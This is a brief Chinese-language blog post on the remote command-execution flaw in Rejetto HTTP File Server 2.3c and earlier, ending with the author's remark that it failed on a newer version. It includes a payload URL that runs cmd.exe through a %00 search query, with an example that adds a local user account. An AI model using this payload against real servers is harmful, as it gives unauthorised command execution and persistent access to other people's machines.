一、HFS漏洞
1、影响版本 : 2.3c以前的2.3x版本
2、HFS:
HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。
3、漏洞描述:
HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。
Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。
4、payload:
Payload:http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}
攻击过程实例
http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}
后话
我的是在官网下的。版本2.3m,有时传下东西是挺方便的
https://www.rejetto.com/hfs/?f=dl
搞到我跑去看了下我的,我就纳闷我的怎么每叼事,复现不了
在看了下资料,N年前的洞洞了,对指定版本有效。
加的群有点乱,也不知道在那个群上面看到有放这个提权工具。
没个卵用,了解下就好